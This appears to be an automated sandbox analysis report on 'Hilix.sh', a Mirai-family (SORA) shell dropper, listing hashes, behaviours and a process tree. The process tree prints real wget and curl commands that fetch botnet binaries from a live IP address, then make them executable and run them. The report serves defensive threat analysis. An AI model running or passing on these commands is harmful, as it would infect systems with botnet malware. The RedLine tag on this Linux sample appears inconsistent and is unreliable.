Analysis
-
max time kernel
150s -
max time network
156s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
02-01-2025 08:18
Static task
static1
Behavioral task
behavioral1
Sample
Hilix.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
Hilix.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
Hilix.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
Hilix.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
Hilix.sh
-
Size
1KB
-
MD5
0c55987ace1771c5cb8533da3b2ba271
-
SHA1
dedbf64de308bb11070bbe67f8c046b4602b7903
-
SHA256
07744254fcb79b4e78cb7c1512db30dc3bb825c1ea6ab11725917fc6bb035782
-
SHA512
68d6db0fbcf4dd9c4486703adcad76439082ddb22c0e4450fdb60c2355ce70017673dd8bbaa2db269e273356a75ecff1348e9ea6762a4acc903408bddc025b09
Malware Config
Extracted
mirai
SORA
Extracted
mirai
SORA
Signatures
-
Mirai family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
Contacts a large (197505) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 728 chmod 734 chmod 763 chmod 810 chmod -
Executes dropped EXE 4 IoCs
ioc pid Process /tmp/SSH 729 SSH /tmp/SSH 735 SSH /tmp/SSH 764 SSH /tmp/SSH 812 SSH -
Modifies Watchdog functionality 1 TTPs 6 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/watchdog SSH -
Enumerates active TCP sockets 1 TTPs 3 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH -
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 3 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself cbc04pedpoim 735 SSH Changes the process name, possibly in an attempt to hide itself maidjcg4pa0gikjgnfb 764 SSH Changes the process name, possibly in an attempt to hide itself 2hb2dmkdjpngo 812 SSH -
Reads system network configuration 1 TTPs 3 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH -
description ioc Process File opened for reading /proc/676/exe SSH File opened for reading /proc/757/exe SSH File opened for reading /proc/329/fd SSH File opened for reading /proc/493/fd SSH File opened for reading /proc/738/fd SSH File opened for reading /proc/739/fd SSH File opened for reading /proc/494/exe SSH File opened for reading /proc/695/exe SSH File opened for reading /proc/743/fd SSH File opened for reading /proc/235/fd SSH File opened for reading /proc/753/exe SSH File opened for reading /proc/494/fd SSH File opened for reading /proc/325/fd SSH File opened for reading /proc/768/fd SSH File opened for reading /proc/807/fd SSH File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/329/fd SSH File opened for reading /proc/691/fd SSH File opened for reading /proc/768/exe SSH File opened for reading /proc/332/fd SSH File opened for reading /proc/334/fd SSH File opened for reading /proc/742/fd SSH File opened for reading /proc/698/exe SSH File opened for reading /proc/165/fd SSH File opened for reading /proc/698/fd SSH File opened for reading /proc/738/fd SSH File opened for reading /proc/1/fd SSH File opened for reading /proc/377/fd SSH File opened for reading /proc/676/fd SSH File opened for reading /proc/765/fd SSH File opened for reading /proc/332/fd SSH File opened for reading /proc/741/fd SSH File opened for reading /proc/377/fd SSH File opened for reading /proc/456/fd SSH File opened for reading /proc/676/fd SSH File opened for reading /proc/375/fd SSH File opened for reading /proc/741/fd SSH File opened for reading /proc/143/fd SSH File opened for reading /proc/165/fd SSH File opened for reading /proc/389/fd SSH File opened for reading /proc/705/fd SSH File opened for reading /proc/770/fd SSH File opened for reading /proc/772/fd SSH File opened for reading /proc/334/fd SSH File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/795/fd SSH File opened for reading /proc/816/fd SSH File opened for reading /proc/817/fd SSH File opened for reading /proc/494/exe SSH File opened for reading /proc/736/exe SSH File opened for reading /proc/456/exe SSH File opened for reading /proc/696/exe SSH File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/1/fd SSH File opened for reading /proc/724/fd SSH File opened for reading /proc/463/exe SSH File opened for reading /proc/765/exe SSH File opened for reading /proc/745/exe SSH File opened for reading /proc/493/fd SSH File opened for reading /proc/768/fd SSH File opened for reading /proc/334/fd SSH File opened for reading /proc/739/exe SSH File opened for reading /proc/332/fd SSH File opened for reading /proc/767/fd SSH -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 731 wget 732 curl 733 cat -
Writes file to tmp directory 9 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Hilix.mpsl wget File opened for modification /tmp/Hilix.mpsl curl File opened for modification /tmp/Hilix.arm5 wget File opened for modification /tmp/Hilix.x86 curl File opened for modification /tmp/Hilix.mips curl File opened for modification /tmp/Hilix.mips wget File opened for modification /tmp/Hilix.arm4 curl File opened for modification /tmp/Hilix.x86 wget File opened for modification /tmp/SSH Hilix.sh
Processes
-
/tmp/Hilix.sh/tmp/Hilix.sh1⤵
- Writes file to tmp directory
PID:698 -
/usr/bin/wgetwget http://51.79.141.121/bins/Hilix.x862⤵
- Writes file to tmp directory
PID:704
-
-
/usr/bin/curlcurl -O http://51.79.141.121/bins/Hilix.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:721
-
-
/bin/catcat Hilix.x862⤵PID:727
-
-
/bin/chmodchmod +x Hilix.sh Hilix.x86 SSH systemd-private-1efad5a3dfef4e41ba998db6220ca005-systemd-timedated.service-rg6s1p2⤵
- File and Directory Permissions Modification
PID:728
-
-
/tmp/SSH./SSH Hilix-SSH2⤵
- Executes dropped EXE
PID:729
-
-
/usr/bin/wgetwget http://51.79.141.121/bins/Hilix.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:731
-
-
/usr/bin/curlcurl -O http://51.79.141.121/bins/Hilix.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:732
-
-
/bin/catcat Hilix.mips2⤵
- System Network Configuration Discovery
PID:733
-
-
/bin/chmodchmod +x Hilix.mips Hilix.sh Hilix.x86 SSH systemd-private-1efad5a3dfef4e41ba998db6220ca005-systemd-timedated.service-rg6s1p2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/SSH./SSH Hilix-SSH2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:735
-
-
/usr/bin/wgetwget http://51.79.141.121/bins/Hilix.mpsl2⤵
- Writes file to tmp directory
PID:744
-
-
/usr/bin/curlcurl -O http://51.79.141.121/bins/Hilix.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/chmodchmod +x Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/SSH./SSH Hilix-SSH2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:764
-
-
/usr/bin/wgetwget http://51.79.141.121/bins/Hilix.arm42⤵PID:773
-
-
/usr/bin/curlcurl -O http://51.79.141.121/bins/Hilix.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:796
-
-
/bin/chmodchmod +x Hilix.arm4 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/SSH./SSH Hilix-SSH2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:812
-
-
/usr/bin/wgetwget http://51.79.141.121/bins/Hilix.arm52⤵
- Writes file to tmp directory
PID:816
-
-
/usr/bin/curlcurl -O http://51.79.141.121/bins/Hilix.arm52⤵PID:837
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
52KB
MD52749d7293c6f90673309d9e75396c750
SHA1ff10e43ea2f7e951fb8e3aa3dc62f012f74217ca
SHA256f17cfd0b79debb63fc16522833b3fdd72ff5f6c2c7e2c932a8940e8115dd40f5
SHA5127c400dce85c9ecbb8ad0c48982215e26b80d85cc8a267c1a4be8e2163d2cf9d8f302420f692081e856b3ac19a3acfb5a6674ed2a1a6b783789026b5e87a2519f
-
Filesize
75KB
MD5dd307c473227b29f08eca8dd1807339f
SHA1a61c1ca4701ccc2ad616d2c6f7f0426201088fb7
SHA25676d92c57b9f5973608133c5f13e71e4756cfb47663d3b8bc7b2dd23ebac76284
SHA512d75431f47d4d5e5ad05e95a0fbb8f4f5ccb8d1eacbcd4031191f546c0442202bcfb654bf8eaea8945f6cbcbf97e2545fb7c55de28bf180b6559031f871308a96